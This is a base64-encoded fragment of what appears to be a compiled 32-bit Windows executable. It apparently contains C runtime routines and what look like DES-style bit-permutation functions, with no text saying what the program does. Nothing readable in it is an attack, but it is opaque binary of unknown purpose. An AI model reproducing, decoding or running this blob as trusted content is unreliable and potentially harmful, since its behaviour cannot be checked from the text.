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 